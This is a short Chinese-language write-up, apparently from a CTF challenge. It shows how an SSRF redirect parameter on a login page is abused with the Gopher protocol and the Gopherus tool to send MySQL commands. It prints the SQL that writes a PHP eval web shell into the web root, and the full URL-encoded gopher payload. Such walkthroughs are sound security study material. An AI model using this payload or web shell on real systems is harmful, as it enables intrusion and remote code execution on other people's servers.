一個登入頁面，登入沒反應，抓包看一下

發現有一個url跳轉，嘗試ssrf讀取檔案

沒成功

這裡用Gopher 協議 攻擊mysql寫入

Gopher 協議可以做很多事情，特別是在 SSRF 中可以發揮很多重要的作用。利用此協議可以攻擊內網的 FTP、Telnet、Redis、Memcache，也可以進行 GET、POST 請求。這無疑極大拓寬了 SSRF 的攻擊面。

具體構造payload需要利用gopherus這個工具

https://github.com/tarunkant/Gopherus

select '<?php eval($_POST[hack]); ?>' INTO OUTFILE '
 
/var/www/html/test.php';

burp傳過去就行，但是注意要先url編碼一下

最終payload

u=Username&returl=gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%254d%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2527%253c%253f%2570%2568%2570%2520%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2568%2561%2563%256b%255d%2529%253b%2520%253f%253e%2527%2520%2549%254e%2554%254f%2520%254f%2555%2554%2546%2549%254c%2545%2520%2527%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2574%2565%2573%2574%252e%2570%2568%2570%2527%253b%2501%2500%2500%2500%2501